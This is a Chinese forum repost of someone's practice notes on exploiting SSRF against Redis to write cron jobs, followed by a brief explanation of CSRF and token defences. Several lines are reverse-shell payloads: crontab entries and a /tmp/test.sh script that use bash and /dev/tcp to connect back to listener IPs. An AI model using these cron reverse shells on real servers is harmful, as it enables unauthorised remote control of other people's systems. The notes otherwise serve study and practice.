f 物联网-ssrf做题随记-任务计划的写入、csrf简朴知识 - Powered by qidao123.com技术社区

ssrf做题随记--任务计划的写入、csrf简朴知识

打印 上一主题 下一主题

主题 1969|帖子 1969|积分 5907

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
目录

ssrf
csrf


ssrf

这里忘记写文档了,然后再次搭建环境一直成功不了所以这里以文字的方式记录一些要注意的点。
redis在低版本下没有降权然后实行的时间是以root权限实行,到了高版本以后就不行了redis被降权了,且假如是高版本稳固版的话是没有办法写入也就是更加安全
  1. * * * * * /bin/bash -i >& /dev/tcp/192.168.0.106/7777 0>&1
复制代码
centos写入任务计划是很正常的,该咋写咋写
ubuntu在写入任务计划的时间,ubuntu下你写入文件的话,写入的文件权限必须是600,不然有一个报错说你这个文件是不安全的,下面这个样子      
  1. cron[53948]: (root) INSECURE MODE (mode 0600 expected)
复制代码
linux里面的cron中command实行的shell环境是/bin/sh,ubuntu下的/bin/sh文件是一个软连接文件,然后再ubuntu中这个软连接文件指向了dash,而我们的反弹计划反弹的是bash
下面我们有两种方式正常再ubuntu中反弹
第一种把软连接指向bash
第二种我们制止在cron文件里去使用bash这个shell,我们可以另外的去建一个反弹shell的shell脚本文件,然后在任务计划里面去直接调用这个shell脚本文件
  1. /tmp/test.sh
  2. #!/bin/bash
  3. /bin/bash -i >& /dev/tcp/192.168.0.107/7777 0>&1
复制代码
 加权
  1. chmod +x /tmp/test.sh
复制代码
 任务计划反弹
  1. * * * * * /tmp/test.sh
复制代码
第三种使用下面语句
  1. */1 * * * *  bash -c "bash -i  >&/dev/tcp/123.207.x.x/1234 0>&1"
复制代码
redis再host字段下面/r/n的语句是没有办法实行的

csrf

全部都是客户端操作,攻击者只是给你发送了一个恶意链接,就比如说是修改暗码的页面,里面的暗码是我先确定好的。然后你提交数据,甚至你不需要提交数据,在你的网站上。然后你在你的网站上操作你的cookie绝对是有效的。然后里面的from表单生效,然后就把你的暗码改掉了。然后我就可以用你的暗码登陆了。
如何防御:在from表单下添加一个字段:token值,这个东西攻击者是伪造不了的,服务器在你第一次登陆的时间,会生成一个token,然后将这个token返回给你,然后下次你再登陆的时间携带这个token值去登陆,然后服务器会检测token的正当性。然后攻击者发送链接的时间并不知道你的token值,然后恶意链接上传的时间发现token不合适就不让这个恶意的网页操作进行。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

天津储鑫盛钢材现货供应商

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表